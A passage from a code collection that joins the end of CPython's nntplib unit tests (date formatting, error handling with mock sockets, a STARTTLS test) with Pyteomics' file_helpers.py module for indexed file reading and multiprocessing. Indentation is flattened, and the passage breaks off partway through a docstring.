gives(2010, 6, 5, 1, 2, 3, "20100605", "010203")
# 2) with a date
def gives(y, M, d, date_str, time_str):
dt = datetime.date(y, M, d)
self.assertEqual(nntplib._unparse_datetime(dt),
(date_str, time_str))
self.assertEqual(nntplib._unparse_datetime(dt, False),
(date_str, time_str))
gives(1999, 6, 23, "19990623", "000000")
gives(2000, 6, 23, "20000623", "000000")
gives(2010, 6, 5, "20100605", "000000")
def test_unparse_datetime_legacy(self):
# Test legacy mode (RFC 977)
# 1) with a datetime
def gives(y, M, d, h, m, s, date_str, time_str):
dt = datetime.datetime(y, M, d, h, m, s)
self.assertEqual(nntplib._unparse_datetime(dt, True),
(date_str, time_str))
gives(1999, 6, 23, 13, 56, 24, "990623", "135624")
gives(2000, 6, 23, 13, 56, 24, "000623", "135624")
gives(2010, 6, 5, 1, 2, 3, "100605", "010203")
# 2) with a date
def gives(y, M, d, date_str, time_str):
dt = datetime.date(y, M, d)
self.assertEqual(nntplib._unparse_datetime(dt, True),
(date_str, time_str))
gives(1999, 6, 23, "990623", "000000")
gives(2000, 6, 23, "000623", "000000")
gives(2010, 6, 5, "100605", "000000")
@unittest.skipUnless(ssl, 'requires SSL support')
def test_ssl_support(self):
self.assertTrue(hasattr(nntplib, 'NNTP_SSL'))
class PublicAPITests(unittest.TestCase):
"""Ensures that the correct values are exposed in the public API."""
def test_module_all_attribute(self):
self.assertTrue(hasattr(nntplib, '__all__'))
target_api = ['NNTP', 'NNTPError', 'NNTPReplyError',
'NNTPTemporaryError', 'NNTPPermanentError',
'NNTPProtocolError', 'NNTPDataError', 'decode_header']
if ssl is not None:
target_api.append('NNTP_SSL')
self.assertEqual(set(nntplib.__all__), set(target_api))
class MockSocketTests(unittest.TestCase):
"""Tests involving a mock socket object
Used where the _NNTPServerIO file object is not enough."""
nntp_class = nntplib.NNTP
def check_constructor_error_conditions(
self, handler_class,
expected_error_type, expected_error_msg,
login=None, password=None):
class mock_socket_module:
def create_connection(address, timeout):
return MockSocket()
class MockSocket:
def close(self):
nonlocal socket_closed
socket_closed = True
def makefile(socket, mode):
handler = handler_class()
_, file = make_mock_file(handler)
files.append(file)
return file
socket_closed = False
files = []
with patch('nntplib.socket', mock_socket_module), \
self.assertRaisesRegex(expected_error_type, expected_error_msg):
self.nntp_class('dummy', user=login, password=password)
self.assertTrue(socket_closed)
for f in files:
self.assertTrue(f.closed)
def test_bad_welcome(self):
#Test a bad welcome message
class Handler(NNTPv1Handler):
welcome = 'Bad Welcome'
self.check_constructor_error_conditions(
Handler, nntplib.NNTPProtocolError, Handler.welcome)
def test_service_temporarily_unavailable(self):
#Test service temporarily unavailable
class Handler(NNTPv1Handler):
welcome = '400 Service temporarily unavailable'
self.check_constructor_error_conditions(
Handler, nntplib.NNTPTemporaryError, Handler.welcome)
def test_service_permanently_unavailable(self):
#Test service permanently unavailable
class Handler(NNTPv1Handler):
welcome = '502 Service permanently unavailable'
self.check_constructor_error_conditions(
Handler, nntplib.NNTPPermanentError, Handler.welcome)
def test_bad_capabilities(self):
#Test a bad capabilities response
class Handler(NNTPv1Handler):
def handle_CAPABILITIES(self):
self.push_lit(capabilities_response)
capabilities_response = '201 bad capability'
self.check_constructor_error_conditions(
Handler, nntplib.NNTPReplyError, capabilities_response)
def test_login_aborted(self):
#Test a bad authinfo response
login = '[email protected]'
password = 'python'
class Handler(NNTPv1Handler):
def handle_AUTHINFO(self, *args):
self.push_lit(authinfo_response)
authinfo_response = '503 Mechanism not recognized'
self.check_constructor_error_conditions(
Handler, nntplib.NNTPPermanentError, authinfo_response,
login, password)
class bypass_context:
"""Bypass encryption and actual SSL module"""
def wrap_socket(sock, **args):
return sock
@unittest.skipUnless(ssl, 'requires SSL support')
class MockSslTests(MockSocketTests):
@staticmethod
def nntp_class(*pos, **kw):
return nntplib.NNTP_SSL(*pos, ssl_context=bypass_context, **kw)
class LocalServerTests(unittest.TestCase):
def setUp(self):
sock = socket.socket()
port = support.bind_port(sock)
sock.listen()
self.background = threading.Thread(
target=self.run_server, args=(sock,))
self.background.start()
self.addCleanup(self.background.join)
self.nntp = NNTP(support.HOST, port, usenetrc=False).__enter__()
self.addCleanup(self.nntp.__exit__, None, None, None)
def run_server(self, sock):
# Could be generalized to handle more commands in separate methods
with sock:
[client, _] = sock.accept()
with contextlib.ExitStack() as cleanup:
cleanup.enter_context(client)
reader = cleanup.enter_context(client.makefile('rb'))
client.sendall(b'200 Server ready\r\n')
while True:
cmd = reader.readline()
if cmd == b'CAPABILITIES\r\n':
client.sendall(
b'101 Capability list:\r\n'
b'VERSION 2\r\n'
b'STARTTLS\r\n'
b'.\r\n'
)
elif cmd == b'STARTTLS\r\n':
reader.close()
client.sendall(b'382 Begin TLS negotiation now\r\n')
context = ssl.SSLContext()
context.load_cert_chain(certfile)
client = context.wrap_socket(
client, server_side=True)
cleanup.enter_context(client)
reader = cleanup.enter_context(client.makefile('rb'))
elif cmd == b'QUIT\r\n':
client.sendall(b'205 Bye!\r\n')
break
else:
raise ValueError('Unexpected command {!r}'.format(cmd))
@unittest.skipUnless(ssl, 'requires SSL support')
def test_starttls(self):
file = self.nntp.file
sock = self.nntp.sock
self.nntp.starttls()
# Check that the socket and internal pseudo-file really were
# changed.
self.assertNotEqual(file, self.nntp.file)
self.assertNotEqual(sock, self.nntp.sock)
# Check that the new socket really is an SSL one
self.assertIsInstance(self.nntp.sock, ssl.SSLSocket)
# Check that trying starttls when it's already active fails.
self.assertRaises(ValueError, self.nntp.starttls)
if __name__ == "__main__":
unittest.main()
|
file_helpers.py
|
import sys
import codecs
import re
from functools import wraps
from contextlib import contextmanager
from collections import OrderedDict, defaultdict
import json
import multiprocessing as mp
import threading
import warnings
import os
from abc import ABCMeta
try:
basestring
except NameError:
basestring = (str, bytes)
try:
import pandas as pd
except ImportError:
pd = None
try:
import numpy as np
except ImportError:
np = None
try:
import dill
except ImportError:
dill = None
try:
import cPickle as pickle
except ImportError:
import pickle
serializer = pickle
else:
serializer = dill
try:
from queue import Empty
except ImportError:
from Queue import Empty
try:
from collections.abc import Sequence
except ImportError:
from collections import Sequence
from .structures import PyteomicsError
from .utils import add_metaclass
def _keepstate(func):
"""Decorator to help keep the position in open files passed as
positional arguments to functions"""
@wraps(func)
def wrapped(*args, **kwargs):
positions = [getattr(arg, 'seek', None) and getattr(arg, 'tell', type(None))() for arg in args]
for arg, pos in zip(args, positions):
if pos is not None:
arg.seek(0)
res = func(*args, **kwargs)
for arg, pos in zip(args, positions):
if pos is not None:
try:
arg.seek(pos)
except ValueError:
pass
return res
return wrapped
def _keepstate_method(func):
"""Decorator for :py:class:`FileReader` methods to help keep the position
in the underlying file.
"""
@wraps(func)
def wrapped(self, *args, **kwargs):
position = self.tell()
self.seek(0)
try:
return func(self, *args, **kwargs)
finally:
self.seek(position)
return wrapped
class _file_obj(object):
"""Check if `f` is a file name and open the file in `mode`.
A context manager."""
def __init__(self, f, mode, encoding=None):
self._file_spec = None
self.mode = mode
if f is None:
self.file = {'r': sys.stdin, 'a': sys.stdout, 'w': sys.stdout
}[mode[0]]
self._file_spec = None
elif isinstance(f, basestring):
self.file = codecs.open(f, mode, encoding)
self._file_spec = f
else:
self._file_spec = f
self.file = f
self.encoding = getattr(self.file, 'encoding', encoding)
self.close_file = (self.file is not f)
def __enter__(self):
return self
def __reduce_ex__(self, protocol):
return self.__class__, (self._file_spec, self.mode, self.encoding)
def __exit__(self, *args, **kwargs):
if (not self.close_file) or self._file_spec is None:
return # do nothing
# clean up
exit = getattr(self.file, '__exit__', None)
if exit is not None:
return exit(*args, **kwargs)
else:
exit = getattr(self.file, 'close', None)
if exit is not None:
exit()
def __getattr__(self, attr):
return getattr(self.file, attr)
def __iter__(self):
return iter(self.file)
class NoOpBaseReader(object):
def __init__(self, *args, **kwargs):
pass
class IteratorContextManager(NoOpBaseReader):
def __init__(self, *args, **kwargs):
self._func = kwargs.pop('parser_func')
self._args = args
self._kwargs = kwargs
if type(self) == IteratorContextManager:
self.reset()
super(IteratorContextManager, self).__init__(*args, **kwargs)
def __getstate__(self):
state = {}
state['_iterator_args'] = self._args
state['_iterator_kwargs'] = self._kwargs
return state
def __setstate__(self, state):
self._args = state['_iterator_args']
self._kwargs = state['_iterator_kwargs']
def reset(self):
"""Resets the iterator to its initial state."""
try:
self._reader = self._func(*self._args, **self._kwargs)
except Exception:
self.__exit__(*sys.exc_info())
raise
def __enter__(self):
return self
def __exit__(self, *args, **kwargs):
pass
def __iter__(self):
return self
def __next__(self):
# try:
return next(self._reader)
# except StopIteration:
# self.__exit__(None, None, None)
# raise
next = __next__
@add_metaclass(ABCMeta)
class FileReader(IteratorContextManager):
"""Abstract class implementing context manager protocol
for file readers.
"""
def __init__(self, source, **kwargs):
func = kwargs['parser_func']
super(FileReader, self).__init__(*kwargs['args'], parser_func=func, **kwargs['kwargs'])
self._pass_file = kwargs['pass_file']
self._source_init = source
self._mode = kwargs['mode']
self._encoding = kwargs.get('encoding')
self.reset()
def reset(self):
if hasattr(self, '_source'):
self._source.__exit__(None, None, None)
self._source = _file_obj(self._source_init, self._mode, self._encoding)
try:
if self._pass_file:
self._reader = self._func(
self._source, *self._args, **self._kwargs)
else:
self._reader = self._func(*self._args, **self._kwargs)
except Exception: # clean up on any error
self.__exit__(*sys.exc_info())
raise
def __exit__(self, *args, **kwargs):
self._source.__exit__(*args, **kwargs)
# delegate everything else to file object
def __getattr__(self, attr):
if attr == '_source':
raise AttributeError
return getattr(self._source, attr)
def remove_bom(bstr):
return bstr.replace(codecs.BOM_LE, b'').lstrip(b"\x00")
class IndexedReaderMixin(NoOpBaseReader):
"""Common interface for :py:class:`IndexedTextReader` and :py:class:`IndexedXML`."""
@property
def index(self):
return self._offset_index
@property
def default_index(self):
return self._offset_index
def __len__(self):
return len(self._offset_index)
def __contains__(self, key):
return key in self._offset_index
def _item_from_offsets(self, offsets):
raise NotImplementedError
def get_by_id(self, elem_id):
index = self.default_index
if index is None:
raise PyteomicsError('Access by ID requires building an offset index.')
offsets = index[elem_id]
return self._item_from_offsets(offsets)
def get_by_ids(self, ids):
return [self.get_by_id(key) for key in ids]
def get_by_index(self, i):
try:
key = self.default_index.from_index(i, False)
except AttributeError:
raise PyteomicsError('Positional access requires building an offset index.')
return self.get_by_id(key)
def get_by_indexes(self, indexes):
return [self.get_by_index(i) for i in indexes]
def get_by_index_slice(self, s):
try:
keys = self.default_index.from_slice(s, False)
except AttributeError:
raise PyteomicsError('Positional access requires building an offset index.')
return self.get_by_ids(keys)
def get_by_key_slice(self, s):
keys = self.default_index.between(s.start, s.stop)
if s.step:
keys = keys[::s.step]
return self.get_by_ids(keys)
def __getitem__(self, key):
if isinstance(key, basestring):
return self.get_by_id(key)
if isinstance(key, int):
return self.get_by_index(key)
if isinstance(key, Sequence):
if not key:
return []
if isinstance(key[0], int):
return self.get_by_indexes(key)
if isinstance(key[0], basestring):
return self.get_by_ids(key)
if isinstance(key, slice):
for item in (key.start, key.stop, key.step):
if item is not None:
break
if isinstance(item, int):
return self.get_by_index_slice(key)
if isinstance(item, basestring):
return self.get_by_key_slice(key)
if item is None:
return list(self)
raise PyteomicsError('Unsupported query key: {}'.format(key))
class RTLocator():
def __init__(self, reader):
self._reader = reader
def _get_scan_by_time(self, time):
"""Retrieve the scan object for the specified scan time.
Parameters
----------
time : float
The time to get the nearest scan from
Returns
-------
tuple: (scan_id, scan, scan_time)
"""
if not self._reader.default_index:
raise PyteomicsError("This method requires the index. Please pass `use_index=True` during initialization")
scan_ids = tuple(self._reader.default_index)
lo = 0
hi = len(scan_ids)
best_match = None
best_error = float('inf')
best_time = None
best_id = None
if time == float('inf'):
scan = self._reader.get_by_id(scan_ids[-1])
return scan_ids[-1], scan, self._reader._get_time(scan)
while hi != lo:
mid = (hi + lo) // 2
sid = scan_ids[mid]
scan = self._reader.get_by_id(sid)
scan_time = self._reader._get_time(scan)
err = abs(scan_time - time)
if err < best_error:
best_error = err
best_match = scan
best_time = scan_time
best_id = sid
if scan_time == time:
return sid, scan, scan_time
elif (hi - lo) == 1:
return best_id, best_match, best_time
elif scan_time > time:
hi = mid
else:
lo = mid
def __getitem__(self, key):
if isinstance(key, (int, float)):
return self._get_scan_by_time(key)[1]
if isinstance(key, Sequence):
return [self._get_scan_by_time(t)[1] for t in key]
if isinstance(key, slice):
if key.start is None:
start_index = self._reader.default_index.from_index(0)
else:
start_index = self._get_scan_by_time(key.start)[0]
if key.stop is None:
stop_index = self._reader.default_index.from_index(-1)
else:
stop_index = self._get_scan_by_time(key.stop)[0]
return self._reader[start_index:stop_index:key.step]
class TimeOrderedIndexedReaderMixin(IndexedReaderMixin):
@property
def time(self):
return self._time
def __init__(self, *args, **kwargs):
super(TimeOrderedIndexedReaderMixin, self).__init__(*args, **kwargs)
self._time = RTLocator(self)
@staticmethod
def _get_time(scan):
raise NotImplementedError
class IndexedTextReader(IndexedReaderMixin, FileReader):
"""Abstract class for text file readers that keep an index of records for random access.
This requires reading the file in binary mode."""
delimiter = None
label = None
block_size = 1000000
label_group = 1
def __init__(self, source, **kwargs):
# the underlying _file_obj gets None as encoding
# to avoid transparent decoding of StreamReader on read() calls
encoding = kwargs.pop('encoding', 'utf-8')
super(IndexedTextReader, self).__init__(source, mode='rb', encoding=None, **kwargs)
self.encoding = encoding
for attr in ['delimiter', 'label', 'block_size', 'label_group']:
if attr in kwargs:
setattr(self, attr, kwargs.pop(attr))
self._offset_index = None
if not kwargs.pop('_skip_index', False):
self._offset_index = self.build_byte_index()
def __getstate__(self):
state = super(IndexedTextReader, self).__getstate__()
state['offset_index'] = self._offset_index
return state
def __setstate__(self, state):
super(IndexedTextReader, self).__setstate__(state)
self._offset_index = state['offset_index']
def _chunk_iterator(self):
fh = self._source.file
delim = remove_bom(self.delimiter.encode(self.encoding))
buff = fh.read(self.block_size)
parts = buff.split(delim)
started_with_delim = buff.startswith(delim)
tail = parts[-1]
front = parts[:-1]
i = 0
for part in front:
i += 1
if part == b"":
continue
if i == 1:
if started_with_delim:
yield delim + part
else:
yield part
else:
yield delim + part
running = True
while running:
buff = fh.read(self.block_size)
if len(buff) == 0:
running = False
buff = tail
else:
buff = tail + buff
parts = buff.split(delim)
tail = parts[-1]
front = parts[:-1]
for part in front:
yield delim + part
yield delim + tail
def _generate_offsets(self):
i = 0
pattern = re.compile(remove_bom(self.label.encode(self.encoding)))
for chunk in self._chunk_iterator():
match = pattern.search(chunk)
if match:
label = match.group(self.label_group)
yield i, label.decode(self.encoding), match
i += len(chunk)
yield i, None, None
def build_byte_index(self):
index = OffsetIndex()
g = self._generate_offsets()
last_offset = 0
last_label = None
for offset, label, keyline in g:
if last_label is not None:
index[last_label] = (last_offset, offset)
last_label = label
last_offset = offset
assert last_label is None
return index
def _read_lines_from_offsets(self, start, end):
self._source.seek(start)
lines = self._source.read(end - start).decode(self.encoding).split('\n')
return lines
class IndexSavingMixin(NoOpBaseReader):
"""Common interface for :py:class:`IndexSavingXML` and :py:class:`IndexSavingTextReader`."""
_index_class = NotImplemented
@property
def _byte_offset_filename(self):
try:
path = self._source.name
except AttributeError:
return None
name, ext = os.path.splitext(path)
byte_offset_filename = '{}-{}-byte-offsets.json'.format(name, ext[1:])
return byte_offset_filename
def _check_has_byte_offset_file(self):
"""Check if the file at :attr:`_byte_offset_filename` exists
Returns
-------
bool
Whether the file exists
"""
path = self._byte_offset_filename
if path is None:
return False
return os.path.exists(path)
@classmethod
def prebuild_byte_offset_file(cls, path):
"""Construct a new XML reader, build its byte offset index and
write it to file
Parameters
----------
path : str
The path to the file to parse
"""
with cls(path) as inst:
inst.write_byte_offsets()
def write_byte_offsets(self):
"""Write the byte offsets in :attr:`_offset_index` to the file
at :attr:`_byte_offset_filename`
"""
with open(self._byte_offset_filename, 'w') as f:
self._offset_index.save(f)
@_keepstate_method
def _build_index(self):
"""Build the byte offset index by either reading these offsets
from the file at :attr:`_byte_offset_filename`, or falling back
to the method used by :class:`IndexedXML` if this operation fails
due to an IOError
"""
if not self._use_index: return
try:
self._read_byte_offsets()
except (IOError, AttributeError, TypeError):
super(IndexSavingMixin, self)._build_index()
def _read_byte_offsets(self):
"""Read the byte offset index JSON file at :attr:`_byte_offset_filename`
and populate :attr:`_offset_index`
"""
with open(self._byte_offset_filename, 'r') as f:
index = self._index_class.load(f)
self._offset_index = index
def _file_reader(_mode='r'):
# a lot of the code below is borrowed from
# http://stackoverflow.com/a/14095585/1258041
def decorator(_func):
"""A decorator implementing the context manager protocol for functions
that read files.
Note: 'close' must be in kwargs! Otherwise it won't be respected.
"""
@wraps(_func)
def helper(*args, **kwargs):
if args:
return FileReader(args[0], mode=_mode, parser_func=_func, pass_file=True, args=args[1:], kwargs=kwargs,
encoding=kwargs.pop('encoding', None))
source = kwargs.pop('source', None)
return FileReader(source, mode=_mode, parser_func=_func, pass_file=True, args=(), kwargs=kwargs, encoding=kwargs.pop('encoding', None))
return helper
return decorator
def _file_writer(_mode='a'):
def decorator(_func):
"""A decorator that opens output files for writer functions.
"""
@wraps(_func)
def helper(*args, **kwargs):
m = kwargs.pop('file_mode', _mode)
enc = kwargs.pop('encoding', None)
if len(args) > 1:
with _file_obj(args[1], m, encoding=enc) as out:
return _func(args[0], out, *args[2:], **kwargs)
else:
with _file_obj(kwargs.pop('output', None), m, encoding=enc) as out:
return _func(*args, output=out, **kwargs)
return helper
return decorator
class WritableIndex(object):
schema_version = (1, 0, 0)
_schema_version_tag_key = "@pyteomics_schema_version"
def _serializable_container(self):
container = {'index': list(self.items())}
return container
def save(self, fp):
container = self._serializable_container()
container[self._schema_version_tag_key] = self.schema_version
json.dump(container, fp)
@classmethod
def load(cls, fp):
container = json.load(fp, object_hook=OrderedDict)
version_tag = container.get(cls._schema_version_tag_key)
if version_tag is None:
# The legacy case, no special processing yet
inst = cls()
inst.schema_version = None
return inst
version_tag = tuple(version_tag)
index = container.get("index")
if version_tag < cls.schema_version:
# schema upgrade case, no special processing yet
inst = cls(index)
inst.schema_version = version_tag
return inst
# no need to upgrade
return cls(index)
class OffsetIndex(OrderedDict, WritableIndex):
'''An augmented OrderedDict that formally wraps getting items by index
'''
def __init__(self, *args, **kwargs):
super(OffsetIndex, self).__init__(*args, **kwargs)
self._index_sequence = None
def _invalidate(self):
self._index_sequence = None
@property
def index_sequence(self):
"""Keeps a cached copy of the :meth:`items` sequence
stored as a :class:`tuple` to avoid repeatedly copying
the sequence over many method calls.
Returns
-------
:class:`tuple`
"""
if self._index_sequence is None:
self._index_sequence = tuple(self.items())
return self._index_sequence
def __setitem__(self, key, value):
self._invalidate()
return super(OffsetIndex, self).__setitem__(key, value)
def pop(self, *args, **kwargs):
self._invalidate()
return super(OffsetIndex, self).pop(*args, **kwargs)
def find(self, key, *args, **kwargs):
return self[key]
def from_index(self, index, include_value=False):
'''Get an entry by its integer index in the ordered sequence
of this mapping.
Parameters
----------
index: int
The index to retrieve.
include_value: bool
Whether to return both the key and the value or just the key.
Defaults to :const:`False`.
Returns
-------
object:
If ``include_value`` is :const:`True`, a tuple of (key, value) at ``index``
else just the key at ``index``.
'''
items = self.index_sequence
if include_value:
return items[index]
else:
return items[index][0]
def from_slice(self, spec, include_value=False):
'''Get a slice along index in the ordered sequence
of this mapping.
Parameters
----------
spec: slice
The slice over the range of indices to retrieve
include_value: bool
Whether to return both the key and the value or just the key.
Defaults to :const:`False`
Returns
-------
list:
If ``include_value`` is :const:`True`, a tuple of (key, value) at ``index``
else just the key at ``index`` for each ``index`` in ``spec``
'''
items = self.index_sequence
return [(k, v) if include_value else k for k, v in items[spec]]
def between(self, start, stop, include_value=False):
keys = list(self)
if start is not None:
try:
start_index = keys.index(start)
except ValueError:
raise KeyError(start)
else:
start_index = 0
if stop is not None:
try:
stop_index = keys.index(stop)
except ValueError:
raise KeyError(stop)
else:
stop_index = len(keys) - 1
if start is None or stop is None:
pass # won't switch indices
else:
start_index, stop_index = min(start_index, stop_index), max(start_index, stop_index)
if include_value:
return [(k, self[k]) for k in keys[start_index:stop_index + 1]]
return keys[start_index:stop_index + 1]
def __repr__(self):
template = "{self.__class__.__name__}({items})"
return template.format(self=self, items=list(self.items()))
def _integrity_check(self):
indices = list(self.values())
sorted_indices = sorted(self.values())
return indices == sorted_indices
def sort(self):
sorted_pairs = sorted(self.items(), key=lambda x: x[1])
self.clear()
self._invalidate()
for key, value in sorted_pairs:
self[key] = value
return self
class IndexSavingTextReader(IndexSavingMixin, IndexedTextReader):
_index_class = OffsetIndex
class HierarchicalOffsetIndex(WritableIndex):
_inner_type = OffsetIndex
def __init__(self, base=None):
self.mapping = defaultdict(self._inner_type)
for key, value in (base or {}).items():
self.mapping[key] = self._inner_type(value)
def _integrity_check(self):
for key, value in self.items():
if not value._integrity_check():
return False
return True
def sort(self):
for key, value in self.items():
value.sort()
return self
def __getitem__(self, key):
return self.mapping[key]
def __setitem__(self, key, value):
self.mapping[key] = value
def __iter__(self):
return iter(self.mapping)
def __len__(self):
return sum(len(group) for key, group in self.items())
def __contains__(self, key):
return key in self.mapping
def find(self, key, element_type=None):
if element_type is None:
for element_type in self.keys():
try:
return self.find(key, element_type)
except KeyError:
continue
raise KeyError(key)
else:
return self[element_type][key]
def find_no_type(self, key):
"""Try to find `key` in each of the lower-level indexes, returning both
value and the element type that match the key."""
for element_type in self.keys():
try:
return self.find(key, element_type), element_type
except KeyError:
continue
raise KeyError(key)
def update(self, *args, **kwargs):
self.mapping.update(*args, **kwargs)
def pop(self, key, default=None):
return self.mapping.pop(key, default)
def keys(self):
return self.mapping.keys()
def values(self):
return self.mapping.values()
def items(self):
return self.mapping.items()
def _serializable_container(self):
encoded_index = {}
container = {
'keys': list(self.keys())
}
for key, offset in self.items():
encoded_index[key] = list(offset.items())
container['index'] = encoded_index
return container
def _make_chain(reader, readername, full_output=False):
def concat_results(*args, **kwargs):
results = [reader(arg, **kwargs) for arg in args]
if pd is not None and all(isinstance(a, pd.DataFrame) for a in args):
return pd.concat(results)
return np.concatenate(results)
def _iter(files, kwargs):
for f in files:
with reader(f, **kwargs) as r:
for item in r:
yield item
def chain(*files, **kwargs):
return _iter(files, kwargs)
def from_iterable(files, **kwargs):
return _iter(files, kwargs)
@contextmanager
def _chain(*files, **kwargs):
yield chain(*files, **kwargs)
@contextmanager
def _from_iterable(files, **kwargs):
yield from_iterable(files, **kwargs)
def dispatch(*args, **kwargs):
return dispatch_from_iterable(args, **kwargs)
def dispatch_from_iterable(args, **kwargs):
if kwargs.get('full_output', full_output):
return concat_results(*args, **kwargs)
return _chain(*args, **kwargs)
dispatch.__doc__ = """Chain :py:func:`{0}` for several files.
Positional arguments should be file names or file objects.
Keyword arguments are passed to the :py:func:`{0}` function.
""".format(readername)
dispatch_from_iterable.__doc__ = """Chain :py:func:`{0}` for several files.
Keyword arguments are passed to the :py:func:`{0}` function.
Parameters
----------
files : iterable
Iterable of file names or file objects.
""".format(readername)
dispatch.from_iterable = dispatch_from_iterable
return dispatch
def _check_use_index(source, use_index, default):
try:
if use_index is not None:
use_index = bool(use_index)
# if a file name is given, do not override anything; short-circuit
if isinstance(source, basestring):
return use_index if use_index is not None else default
# collect information on source
if hasattr(source, 'seekable'):
seekable = source.seekable()
else:
seekable = None
if hasattr(source, 'mode'):
binary = 'b' in source.mode
else:
binary = None
# now check for conflicts
if seekable is False:
if binary:
raise PyteomicsError('Cannot work with non-seekable file in binary mode: {}.'.format(source))
if use_index:
warnings.warn('Cannot use indexing as {} is not seekable. Setting `use_index` to False.'.format(source))
use_index = False
elif binary is not None:
if use_index is not None and binary != use_index:
warnings.warn('use_index is {}, but the file mode is {}. '
'Setting `use_index` to {}'.format(use_index, source.mode, binary))
use_index = binary
else:
warnings.warn('Could not check mode on {}. Specify `use_index` explicitly to avoid errors.'.format(source))
if use_index is not None:
return use_index
return default
except PyteomicsError:
raise
except Exception as e:
warnings.warn('Could not check mode on {}. Reason: {!r}. Specify `use_index` explicitly to avoid errors.'.format(source, e))
if use_index is not None:
return use_index
return default
class FileReadingProcess(mp.Process):
"""Process that does a share of distributed work on entries read from file.
Reconstructs a reader object, parses an entries from given indexes,
optionally does additional processing, sends results back.
The reader class must support the :py:meth:`__getitem__` dict-like lookup.
"""
def __init__(self, reader_spec, target_spec, qin, qout, args_spec, kwargs_spec):
super(FileReadingProcess, self).__init__(name='pyteomics-map-worker')
self.reader_spec = reader_spec
self.target_spec = target_spec
self.args_spec = args_spec
self.kwargs_spec = kwargs_spec
self._qin = qin
self._qout = qout
# self._in_flag = in_flag
self._done_flag = mp.Event()
self.daemon = True
def run(self):
reader = serializer.loads(self.reader_spec)
target = serializer.loads(self.target_spec)
args = serializer.loads(self.args_spec)
kwargs = serializer.loads(self.kwargs_spec)
for key in iter(self._qin.get, None):
item = reader[key]
if target is not None:
result = target(item, *args, **kwargs)
else:
result = item
self._qout.put(result)
self._done_flag.set()
def is_done(self):
return self._done_flag.is_set()
try:
_NPROC = mp.cpu_count()
except NotImplementedError:
_NPROC = 4
_QUEUE_TIMEOUT = 4
_QUEUE_SIZE = int(1e7)
class TaskMappingMixin(NoOpBaseReader):
def __init__(self, *args, **kwargs):
'''
Instantiate a :py:class:`TaskMappingMixin` object, set default parameters for IPC.
Parameters
----------
queue_timeout : float, keyword only, optional
The number of seconds to block, waiting for a result before checking to see if
all workers are done.
queue_size : int, keyword only, optional
The length of IPC queue used.
processes : int, keyword only, optional
Number of worker processes to spawn when :py:meth:`map` is called. This can also be
specified in the :py:meth:`map` call.
'''
self._queue_size = kwargs.pop('queue_size', _QUEUE_SIZE)
self._queue_timeout = kwargs.pop('timeout', _QUEUE_TIMEOUT)
self._nproc = kwargs.pop('processes', _NPROC)
super(TaskMappingMixin, self).__init__(*args, **kwargs)
def _get_reader_for_worker_spec(self):
return self
def _build_worker_spec(self, target, args, kwargs):
serialized = []
for obj, objname in [(self._get_reader_for_worker_spec(), 'reader'), (target, 'target'), (args, 'args'),
(kwargs, 'kwargs')]:
try:
serialized.append(serializer.dumps(obj))
except serializer.PicklingError:
msg = 'Could not serialize {0} {1} with {2.__name__}.'.format(objname, obj, serializer)
if serializer is not dill:
msg += ' Try installing `dill`.'
raise PyteomicsError(msg)
return serialized
def _spawn_workers(self, specifications, in_queue, out_queue, processes):
reader_spec, target_spec, args_spec, kwargs_spec = specifications
workers = []
for _ in range(processes):
worker = FileReadingProcess(
reader_spec, target_spec, in_queue, out_queue, args_spec, kwargs_spec)
workers.append(worker)
return workers
def _spawn_feeder_thread(self, in_queue, iterator, processes):
def feeder():
for key in iterator:
in_queue.put(key)
for _ in range(processes):
in_queue.put(None)
feeder_thread = threading.Thread(target=feeder)
feeder_thread.daemon = True
feeder_thread.start()
return feeder_thread
def map(self, target=None, processes=-1, args=None, kwargs=None, **_kwargs):
"""Execute the ``target`` function over entries of this object across up to ``processes``
processes.
Results will be returned out of order.
Parameters
----------
target : :class:`Callable`, optional
The function to execute over each entry. It will be given a single object yielded by
the wrapped iterator as well as all of the values in ``args`` and ``kwargs``
processes : int, optional
The number of worker processes to use. If 0 or negative,
defaults to the number of available CPUs.
This parameter can also be set at reader creation.
args : :class:`Sequence`, optional
Additional positional arguments to be passed to the target function
kwargs : :class:`Mapping`, optional
Additional keyword arguments to be passed to the target function
**_kwargs
Additional keyword arguments to be passed to the target function
Yields
------
object
The work item returned by the target function.
"""
if self._offset_index is None:
raise PyteomicsError('The reader needs an index for map() calls. Create the reader with `use_index=True`.')
if processes < 1:
processes = self._nproc
iterator = self._task_map_iterator()
if args is None:
args = tuple()
else:
args = tuple(args)
if kwargs is None:
kwargs = dict()
else:
kwargs = dict(kwargs)
kwargs.update(_kwargs)
serialized = self._build_worker_spec(target, args, kwargs)
in_queue = mp.Queue(self._queue_size)
out_queue = mp.Queue(self._queue_size)
workers = self._spawn_workers(serialized, in_queue, out_queue, processes)
feeder_thread = self._spawn_feeder_thread(in_queue, iterator, processes)
for worker in workers:
worker.start()
def iterate():
while True:
try:
result = out_queue.get(True, self._queue_timeout)
yield result
except Empty:
if all(w.is_done() for w in workers):
break
else:
continue
feeder_thread.join()
for worker in workers:
worker.join()
return iterate()
def _task_map_iterator(self):
"""Returns the :class:`Iteratable` to use when dealing work items onto the input IPC
queue used by :meth:`map`
Returns
-------
:class:`Iteratable`
"""
return iter(self._offset_index.keys())
class ChainBase(object):
"""Chain :meth:`sequence_maker` for several sources into a
single iterable. Positional arguments should be sources like
file names or file objects. Keyword arguments are passed to
the :meth:`sequence_maker` function.
Attributes
----------
sources : :class:`Iterable`
Sources for creating new sequences from, such as paths or
file-like objects
kwargs : :class:`Mapping`
Additional arguments used to instantiate each sequence
"""
def __init__(self, *sources, **kwargs):
self.sources = sources
self.kwargs = kwargs
self._iterator = None
@classmethod
def from_iterable(cls, sources, **kwargs):
return cls(*sources, **kwargs)
@classmethod
def _make_chain(cls, sequence_maker):
if isinstance(sequence_maker, type):
tp = type('%sChain' % sequence_maker.__class__.__name__, (cls,), {
'sequence_maker': sequence_maker
})
else:
tp = type('FunctionChain', (cls,), {
'sequence_maker': staticmethod(sequence_maker)
})
return tp
def sequence_maker(self, file):
raise NotImplementedError()
def _create_sequence(self, file):
return self.sequence_maker(file, **self.kwargs)
def _iterate_over_series(self):
for f in self.sources:
with self._create_sequence(f) as r:
for item in r:
yield item
def __enter__(self):
self._iterator = iter(self._iterate_over_series())
return self
def __exit__(self, *args, **kwargs):
self._iterator = None
def __iter__(self):
return self
def __next__(self):
if self._iterator is None:
self._iterator = self._iterate_over_series()
return next(self._iterator)
def next(self):
return self.__next__()
def map(self, target=None, processes=-1, queue_timeout=_QUEUE_TIMEOUT, args=None, kwargs=None, **_kwargs):
"""Execute the ``target`` function over entries of this object across up to ``processes``
processes.
